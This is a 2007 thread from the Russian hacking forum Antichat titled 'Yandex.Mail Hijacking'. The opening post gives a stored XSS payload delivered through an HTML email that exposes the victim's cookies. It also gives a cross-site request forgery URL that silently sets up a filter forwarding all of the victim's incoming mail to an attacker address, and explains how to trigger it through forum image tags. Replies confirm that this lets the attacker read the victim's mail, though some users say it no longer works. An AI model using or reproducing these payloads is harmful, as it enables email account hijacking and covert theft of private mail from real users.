ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
Перезагрузить страницу Яндекс.Почта Hijacking
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Яндекс.Почта Hijacking
  #1  
Старый 19.08.2007, 19:41
V1k
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137

Репутация: 201
По умолчанию Яндекс.Почта Hijacking
1. XSS
При получении письма в html-формате, url картинки из img тэга добавляется в onerror событие. чтобы получить всплывающее окно с cookies, нужно отправить письмо вида
Код:
<img src=http://ya.ru/a?');alert(document.cookie+'>
2. Mail Forwarding
При создании почтовых фильтров возможна передача параметров методом get. при этом нет никакой дополнительной проверки. Если пользователь перейдет по ссылке вида
Код:
http://mail.yandex.ru/classic/action_setup_filter_create?filter_name=%20&letter=selected&logic=0&field1=from&field2=4&field3=neverwillbereceived&move_folder=%D0%92%D1%85%D0%BE%D0%B4%D1%8F%D1%89%D0%B8%D0%B5&cliker=forward&forward_address=xakep@antichat.ru&forward_with_store=on&order=1
то отныне вся входящая почта будет пересылаться также на адрес xakep@antichat.ru. С помощью <?php header() ?> + apache + mod_rewrite можно похищать почту пользователей с незавершенными сессиями на yandex.ru, например, на этом ресурсе, используя img bbcode.
Последний раз редактировалось V1k; 19.08.2007 в 20:19..
 
Ответить с цитированием

  #2  
Старый 20.08.2007, 17:24
Alexsize
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375

Репутация: 4268


По умолчанию
То есть, фактичеки это позволит читать письма жертвы?
__________________
...
 
Ответить с цитированием

  #3  
Старый 20.08.2007, 17:34
V1k
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137

Репутация: 201
По умолчанию
те, которые придут после просмотра жертвой картинки/посещения ссылки -да
 
Ответить с цитированием

  #4  
Старый 21.08.2007, 16:27
DSSS
Новичок
Регистрация: 18.06.2007
Сообщений: 2
Провел на форуме:
25257

Репутация: 0
Отправить сообщение для DSSS с помощью ICQ
По умолчанию
баян
 
Ответить с цитированием

  #5  
Старый 22.08.2007, 00:39
Skaret
Новичок
Регистрация: 13.08.2007
Сообщений: 3
Провел на форуме:
31667

Репутация: -12
По умолчанию
Что-то не работает..Ты сам проверял?
 
Ответить с цитированием

  #6  
Старый 23.08.2007, 20:45
inv
Banned
Регистрация: 03.08.2007
Сообщений: 313
Провел на форуме:
951141

Репутация: 291
По умолчанию
честно говоря я сам уже давно не проверял
раньше для создания фильтра на яндексе вроде был важен реферер,гет запрос прокатывал
На рамблере например реферер не помню проверяется или нет,вроде нет,
но катит только пост запрос,по крайней мере когда это пробовал я..
 
Ответить с цитированием

  #7  
Старый 23.08.2007, 20:53
vadim399
Banned
Регистрация: 27.05.2007
Сообщений: 368
Провел на форуме:
3969605

Репутация: 589
Отправить сообщение для vadim399 с помощью ICQ
По умолчанию
Нече не пашет...
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ